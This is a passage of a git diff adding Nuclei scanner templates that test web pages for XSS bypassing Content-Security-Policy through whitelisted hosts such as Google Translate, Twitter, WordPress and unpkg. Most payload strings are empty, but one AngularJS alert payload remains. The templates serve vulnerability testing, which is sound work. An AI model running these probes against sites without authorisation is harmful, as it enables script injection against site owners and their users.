"tiktok_analytics_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/translate-google-csp-xss.yaml b/dast/vulnerabilities/xss/csp/translate-google-csp-xss.yaml new file mode 100644 index 00000000000..ac99d5c7d23 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/translate-google-csp-xss.yaml @@ -0,0 +1,55 @@ +id: translate-google-csp-xss + +info: + name: Content-Security-Policy Bypass via Google Translate + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,google + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: translate_google_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "translate_google_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/translate-googleapis-csp-xss.yaml b/dast/vulnerabilities/xss/csp/translate-googleapis-csp-xss.yaml new file mode 100644 index 00000000000..d4ba9d4fe9b --- /dev/null +++ b/dast/vulnerabilities/xss/csp/translate-googleapis-csp-xss.yaml @@ -0,0 +1,55 @@ +id: translate-googleapis-csp-xss + +info: + name: Content-Security-Policy Bypass via Google Translate API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,google + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: translate_googleapis_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "translate_googleapis_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/translate-yandex-csp-xss.yaml b/dast/vulnerabilities/xss/csp/translate-yandex-csp-xss.yaml new file mode 100644 index 00000000000..881620169ca --- /dev/null +++ b/dast/vulnerabilities/xss/csp/translate-yandex-csp-xss.yaml @@ -0,0 +1,55 @@ +id: translate-yandex-csp-xss + +info: + name: Content-Security-Policy Bypass via Yandex Translate + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,yandex + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: translate_yandex_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "translate_yandex_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/tumblr-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/tumblr-api-csp-xss.yaml new file mode 100644 index 00000000000..f0df4772dde --- /dev/null +++ b/dast/vulnerabilities/xss/csp/tumblr-api-csp-xss.yaml @@ -0,0 +1,55 @@ +id: tumblr-api-csp-xss + +info: + name: Content-Security-Policy Bypass via Tumblr API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,tumblr + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: tumblr_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "tumblr_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/twitter-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/twitter-api-csp-xss.yaml new file mode 100644 index 00000000000..baa6e590235 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/twitter-api-csp-xss.yaml @@ -0,0 +1,55 @@ +id: twitter-api-csp-xss + +info: + name: Content-Security-Policy Bypass via Twitter API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,twitter + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: twitter_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "twitter_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/twitter-csp-xss.yaml b/dast/vulnerabilities/xss/csp/twitter-csp-xss.yaml new file mode 100644 index 00000000000..fdfb51dce12 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/twitter-csp-xss.yaml @@ -0,0 +1,55 @@ +id: twitter-csp-xss + +info: + name: Content-Security-Policy Bypass via Twitter + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,twitter + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: twitter_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "twitter_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/udgnoz7mccyaowzp-public-blob-vercel-storage-csp-xss.yaml b/dast/vulnerabilities/xss/csp/udgnoz7mccyaowzp-public-blob-vercel-storage-csp-xss.yaml new file mode 100644 index 00000000000..5ae7610a7bb --- /dev/null +++ b/dast/vulnerabilities/xss/csp/udgnoz7mccyaowzp-public-blob-vercel-storage-csp-xss.yaml @@ -0,0 +1,55 @@ +id: udgnoz7mccyaowzp-public-blob-vercel-storage-csp-xss + +info: + name: Content-Security-Policy Bypass via Vercel Storage + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,vercel + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: udgnoz7mccyaowzp_public_blob_vercel_storage_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "udgnoz7mccyaowzp_public_blob_vercel_storage_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/ug-alibaba-csp-xss.yaml b/dast/vulnerabilities/xss/csp/ug-alibaba-csp-xss.yaml new file mode 100644 index 00000000000..93d14b06a8d --- /dev/null +++ b/dast/vulnerabilities/xss/csp/ug-alibaba-csp-xss.yaml @@ -0,0 +1,55 @@ +id: ug-alibaba-csp-xss + +info: + name: Content-Security-Policy Bypass via Alibaba + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,alibaba + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: ug_alibaba_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "ug_alibaba_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/uk-indeed-csp-xss.yaml b/dast/vulnerabilities/xss/csp/uk-indeed-csp-xss.yaml new file mode 100644 index 00000000000..2f34a9f6cfb --- /dev/null +++ b/dast/vulnerabilities/xss/csp/uk-indeed-csp-xss.yaml @@ -0,0 +1,55 @@ +id: uk-indeed-csp-xss + +info: + name: Content-Security-Policy Bypass via Indeed UK + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,indeed + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: uk_indeed_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "uk_indeed_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/ulogin-csp-xss.yaml b/dast/vulnerabilities/xss/csp/ulogin-csp-xss.yaml new file mode 100644 index 00000000000..740cc8c9b1a --- /dev/null +++ b/dast/vulnerabilities/xss/csp/ulogin-csp-xss.yaml @@ -0,0 +1,55 @@ +id: ulogin-csp-xss + +info: + name: Content-Security-Policy Bypass via ULogin + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,ulogin + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: ulogin_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "ulogin_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/unpkg-angular-csp-xss.yaml b/dast/vulnerabilities/xss/csp/unpkg-angular-csp-xss.yaml new file mode 100644 index 00000000000..b19d7d86e78 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/unpkg-angular-csp-xss.yaml @@ -0,0 +1,55 @@ +id: unpkg-angular-csp-xss + +info: + name: Content-Security-Policy Bypass via Unpkg Angular + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,unpkg + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '
' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: unpkg_angular_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "unpkg_angular_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/unpkg-hyperscript-csp-xss.yaml b/dast/vulnerabilities/xss/csp/unpkg-hyperscript-csp-xss.yaml new file mode 100644 index 00000000000..af132775dcf --- /dev/null +++ b/dast/vulnerabilities/xss/csp/unpkg-hyperscript-csp-xss.yaml @@ -0,0 +1,55 @@ +id: unpkg-hyperscript-csp-xss + +info: + name: Content-Security-Policy Bypass via Unpkg Hyperscript + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,unpkg + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: unpkg_hyperscript_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "unpkg_hyperscript_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/urs-pbs-csp-xss.yaml b/dast/vulnerabilities/xss/csp/urs-pbs-csp-xss.yaml new file mode 100644 index 00000000000..c559750d741 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/urs-pbs-csp-xss.yaml @@ -0,0 +1,55 @@ +id: urs-pbs-csp-xss + +info: + name: Content-Security-Policy Bypass via PBS URS + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,pbs + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: urs_pbs_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "urs_pbs_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/vimeo-csp-xss.yaml b/dast/vulnerabilities/xss/csp/vimeo-csp-xss.yaml new file mode 100644 index 00000000000..cc9de711696 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/vimeo-csp-xss.yaml @@ -0,0 +1,55 @@ +id: vimeo-csp-xss + +info: + name: Content-Security-Policy Bypass via Vimeo + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,vimeo + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: vimeo_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "vimeo_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/visitor-pixplug-csp-xss.yaml b/dast/vulnerabilities/xss/csp/visitor-pixplug-csp-xss.yaml new file mode 100644 index 00000000000..3b61cc1b908 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/visitor-pixplug-csp-xss.yaml @@ -0,0 +1,55 @@ +id: visitor-pixplug-csp-xss + +info: + name: Content-Security-Policy Bypass via Pixplug Visitor + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,pixplug + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: visitor_pixplug_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "visitor_pixplug_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/visitor-service-tealiumiq-csp-xss.yaml b/dast/vulnerabilities/xss/csp/visitor-service-tealiumiq-csp-xss.yaml new file mode 100644 index 00000000000..19002ae5e5e --- /dev/null +++ b/dast/vulnerabilities/xss/csp/visitor-service-tealiumiq-csp-xss.yaml @@ -0,0 +1,55 @@ +id: visitor-service-tealiumiq-csp-xss + +info: + name: Content-Security-Policy Bypass via TealiumIQ Visitor Service + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,tealiumiq + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: visitor_service_tealiumiq_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "visitor_service_tealiumiq_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/vk-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/vk-api-csp-xss.yaml new file mode 100644 index 00000000000..55629180057 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/vk-api-csp-xss.yaml @@ -0,0 +1,55 @@ +id: vk-api-csp-xss + +info: + name: Content-Security-Policy Bypass via VK API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,vk + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: vk_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "vk_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/wb-amap-csp-xss.yaml b/dast/vulnerabilities/xss/csp/wb-amap-csp-xss.yaml new file mode 100644 index 00000000000..cb01bd49eb5 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/wb-amap-csp-xss.yaml @@ -0,0 +1,55 @@ +id: wb-amap-csp-xss + +info: + name: Content-Security-Policy Bypass via Amap WB + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,amap + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: wb_amap_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "wb_amap_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/widget-usersnap-csp-xss.yaml b/dast/vulnerabilities/xss/csp/widget-usersnap-csp-xss.yaml new file mode 100644 index 00000000000..cdfc3627cf1 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/widget-usersnap-csp-xss.yaml @@ -0,0 +1,55 @@ +id: widget-usersnap-csp-xss + +info: + name: Content-Security-Policy Bypass via Usersnap Widget + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,usersnap + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: widget_usersnap_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "widget_usersnap_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/widgets-pinterest-csp-xss.yaml b/dast/vulnerabilities/xss/csp/widgets-pinterest-csp-xss.yaml new file mode 100644 index 00000000000..7be61d69a52 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/widgets-pinterest-csp-xss.yaml @@ -0,0 +1,55 @@ +id: widgets-pinterest-csp-xss + +info: + name: Content-Security-Policy Bypass via Pinterest Widgets + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,pinterest + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: widgets_pinterest_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "widgets_pinterest_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/wikipedia-csp-xss.yaml b/dast/vulnerabilities/xss/csp/wikipedia-csp-xss.yaml new file mode 100644 index 00000000000..76d58cfbfa0 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/wikipedia-csp-xss.yaml @@ -0,0 +1,55 @@ +id: wikipedia-csp-xss + +info: + name: Content-Security-Policy Bypass via Wikipedia API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,wikipedia + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: wikipedia_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "wikipedia_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/wordpress-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/wordpress-api-csp-xss.yaml new file mode 100644 index 00000000000..3ee7807ea53 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/wordpress-api-csp-xss.yaml @@ -0,0 +1,55 @@ +id: wordpress-api-csp-xss + +info: + name: Content-Security-Policy Bypass via WordPress API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,wordpress + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: wordpress_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "wordpress_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/wordpress-csp-xss.yaml b/dast/vulnerabilities/xss/csp/wordpress-csp-xss.yaml new file mode 100644 index 00000000000..7c030ec3b51 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/wordpress-csp-xss.yaml @@ -0,0 +1,55 @@ +id: wordpress-csp-xss + +info: + name: Content-Security-Policy Bypass via WordPress API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,wordpress + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: wordpress_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "wordpress_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/wse-api-here-csp-xss.yaml b/dast/vulnerabilities/xss/csp/wse-api-here-csp-xss.yaml new file mode 100644 index 00000000000..0333978a2a0 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/wse-api-here-csp-xss.yaml @@ -0,0 +1,55 @@ +id: wse-api-here-csp-xss + +info: + name: Content-Security-Policy Bypass via HERE API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,here + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: wse_api_here_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "wse_api_here_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-ancestrycdn-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-ancestrycdn-csp-xss.yaml new file mode 100644 index 00000000000..900a228c344 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-ancestrycdn-csp-xss.yaml @@ -0,0 +1,55 @@ +id: www-ancestrycdn-csp-xss + +info: + name: Content-Security-Policy Bypass via Ancestry CDN + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,ancestrycdn + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '
foo
{{ [1].reduce(value.alert, 1); }}
' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_ancestrycdn_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_ancestrycdn_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-api-ibm-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-api-ibm-csp-xss.yaml new file mode 100644 index 00000000000..c2fd0c94538 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-api-ibm-csp-xss.yaml @@ -0,0 +1,55 @@ +id: www-api-ibm-csp-xss + +info: + name: Content-Security-Policy Bypass via IBM API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,ibm + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_api_ibm_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - 